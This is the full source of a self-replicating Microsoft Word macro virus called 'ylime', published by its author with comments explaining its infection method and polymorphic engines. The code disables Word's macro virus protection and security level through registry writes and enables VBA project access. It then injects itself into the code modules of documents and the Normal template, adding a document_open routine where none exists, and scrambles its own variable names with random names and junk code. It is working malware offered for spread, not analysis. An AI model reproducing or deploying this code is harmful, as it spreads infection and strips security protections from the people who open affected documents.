' ' hi, kids. welcome to my newest creation: WordMacro.ylime. ' ' ylime, or "emily" backwards, is the first macro virus i've ' written that i think is worth publishing (hello, EOF!), even though ' it has not been tested properly. ' ' the virus should be able to infect documents regardless of the ' version of microsoft word the user has (8.0+). this has only been ' tested on 8.0 and 11.0, but in theory, it should work on all ' versions. ' ' ylime uses a new method of infecting documents (i think � if ' not, sue me :p): EPO (entry-point obscuring) mixed with appending. ' the virus searches in every available "vbcomponent" for its ' signature (which happens to be its name) for the declaration of a ' sub-routine or a function. ' ' if found, the virus places a call ("gosub" in vb = jmp in asm) ' to its code which is located at the end of the sub/function. an ' example of an infected procedure: ' ' Private Function testProcedure() ' GoSub ylimeStart ' ' Dim variable1 As String ' Dim variable2 As Integer ' ' variable1 = "hello world!" ' variable2 = 64 ' ' MsgBox variable1, variable2, variable1 ' ' End ' ' ylimeStart: ' [ . . . ] ' End Function ' ' if there is no sub-routine or function declared in the code ' module, then the virus creates its own sub, "document_open". after ' creating the sub, it adds its code along with a call to its code. ' ' Private Sub document_open() ' GoSub ylimeStart ' End ' ylimeStart: ' [ . . . ] ' End Sub ' ' the virus also uses two different polymorphic engines: a ' garbage-code/comment generator and a slightly modified version of ' NPE to change its variable names (thanks, Necro). the ' garbage-codes will be a random variable name with a random value ' (either a number or a string). the garbage-comments will either ' start with a ' or rem and will be followed by somewhere between 15 ' and 100 random characters. by themselves, these polymorphic ' engines won't accomplish much, but the two of them working together ' should make a decent engine, imo. ' ' i think that's all you need to know . . . ' ' kefi / detroit / 08 ' ylimeStart: Set vApplication = Application 'ylime Set vOptions = Options 'ylime Set vSystem = vApplication.System 'ylime If vApplication.Version = "8.0" Then 'ylime vSystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Options", "EnableMacroVirusProtection") = "0" 'ylime vOptions.VirusProtection = False 'ylime vOptions.SaveNormalPrompt = False 'ylime Else 'ylime vSystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & vApplication.Version & "\Word\Security", "Level") = &H1 'ylime vSystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & vApplication.Version & "\Word\Security", "AccessVBOM") = &H1 'ylime End If 'ylime Set vTDCodeModule = ThisDocument.VBProject.vbcomponents(1).codemodule 'ylime vTDCode = vTDCodeModule.Lines(1, vTDCodeModule.CountOfLines) 'ylime vYlimeCode = "" 'ylime For Each vCodeLine In Split(vTDCode, vbCrLf) 'ylime If vCodeLine Like "*ylime*" And Not vCodeLine = "GoSub ylimeStart" Then 'ylime GoSub takeOutTheTrash 'ylime If vYlimeCode = "" Then 'ylime If Not vGarbage = "" Then vYlimeCode = vGarbage & vbCrLf 'ylime vYlimeCode = vYlimeCode & vCodeLine & vbCrLf 'ylime Else 'ylime vYlimeCode = vYlimeCode & vCodeLine & vbCrLf 'ylime If Not vGarbage = "" Then vYlimeCode = vYlimeCode & vGarbage 'ylime End If 'ylime End If 'ylime Next 'ylime GoSub switchItUp 'ylime If vApplication.MacroContainer = NormalTemplate Then Set vDocument = ActiveDocument Else Set vDocument = NormalTemplate 'ylime For Each vDocComponent In vDocument.VBProject.vbcomponents 'ylime vDCCoL = vDocComponent.codemodule.CountOfLines 'ylime If vDCCoL > 3 Then 'ylime vDCCode = vDocComponent.codemodule.Lines(1, vDocComponent.codemodule.CountOfLines) 'ylime If Not vDCCode Like "*ylime*" Then 'ylime For Each vDCLine In Split(vDCCode, vbCrLf) 'ylime If vDCLine Like "*Su" & "b *" Or vDCLine Like "*Func" & "tion *" Then 'ylime vInfectedCode = vInfectedCode & vDCLine & vbCrLf & "gosub ylimeStart" & vbCrLf 'ylime ElseIf vDCLine Like "End Sub*" Or vDCLine Like "End Function*" Then 'ylime vInfectedCode = vInfectedCode & "end" & vbCrLf & vYlimeCode & vbCrLf & vDCLine 'ylime Else 'ylime vInfectedCode = vInfectedCode & vDCLine & vbCrLf 'ylime End If 'ylime GoSub takeOutTheTrash 'ylime If Int(Rnd() * 3) = 2 Then vInfectedCode = vInfectedCode & vGarbage & vbCrLf Next 'ylime vDocComponent.codemodule.DeleteLines 1, vDocComponent.codemodule.CountOfLines 'ylime vDocComponent.codemodule.AddFromString vInfectedCode 'ylime End If 'ylime Else 'ylime vInfectedCode = "private s" & "ub document_open()" 'ylime vInfectedCode = vInfectedCode & vbCrLf & "gosub ylimeStart" & vbCrLf & "end" 'ylime vInfectedCode = vInfectedCode & vbCrLf & vYlimeCode & vbCrLf & "end s" & "ub" 'ylime vDocComponent.codemodule.AddFromString vInfectedCode 'ylime End If 'ylime Next 'ylime Return 'ylime switchItUp: 'ylime Randomize 'ylime For Each vVariable In Split("vApplication:vOptions:vSystem:vTDCodeModule:vTDCode:vCodeLine:takeOutTheTrash:vYlimeCode:vGarbage:vDocument:vDocComponent:vDCCode:vInfectedCode:switchitup:vDCLine:vNewVariable:vVariable:vCodeLen:vCounter:vPOSofVar:vLeftOf:vRightOf:vDecider:vTMPVariable:vTMPValue", ":") 'ylime vNewVariable = "" 'ylime For vCounter = 1 To Int(Rnd() * 9) + 5 'ylime vNewVariable = vNewVariable & Chr(Int(Rnd() * 26) + 97) 'ylime Next 'ylime vCodeLen = Len(vYlimeCode) 'ylime While InStr(1, vYlimeCode, vVariable, vbTextCompare) 'ylime vPOSofVar = InStr(1, vYlimeCode, vVariable, vbTextCompare) 'ylime vLeftOf = Left(vYlimeCode, vPOSofVar - 1) 'ylime vRightOf = Mid(vYlimeCode, vPOSofVar + Len(vVariable), vCodeLen - vPOSofVar) 'ylime vYlimeCode = vLeftOf & vNewVariable & vRightOf 'ylime Wend 'ylime Next 'ylime Return 'ylime takeOutTheTrash: 'ylime Randomize 'ylime vGarbage = "": vDecider = Int(Rnd() * 4) + 1 'ylime If vDecider = 1 Then 'ylime If Int(Rnd() * 2) + 1 = 2 Then vGarbage = "rem " Else vGarbage = "' " 'ylime For vCounter = 1 To Int(Rnd() * 85) + 15 'ylime vGarbage = vGarbage & Chr(Int(Rnd() * 26) + 97) 'ylime Next 'ylime vGarbage = vGarbage & vbCrLf 'ylime ElseIf vDecider = 2 Then 'ylime vTMPVariable = "": vTMPValue = 0 'ylime For vCounter = 1 To Int(Rnd() * 5) + 5 'ylime vTMPVariable = vTMPVariable & Chr(Int(Rnd() * 26) + 97) 'ylime Next 'ylime If Int(Rnd() * 2) + 1 = 2 Then 'ylime For vCounter = 1 To Int(Rnd() * 5) 'ylime vTMPValue = vTMPValue + (Rnd() * 23) 'ylime Next 'ylime Else 'ylime vTMPValue = Chr(34) 'ylime For vCounter = 1 To Int(Rnd() * 15) + 4 'ylime vTMPValue = vTMPValue & Chr(Int(Rnd() * 26) + 97) 'ylime Next 'ylime vTMPValue = vTMPValue & Chr(34) 'ylime End If 'ylime vGarbage = vTMPVariable & "=" & vTMPValue 'ylime vGarbage = vGarbage & vbCrLf 'ylime End If 'ylime Return 'wordmacro.ylime / kefi / detroit / 08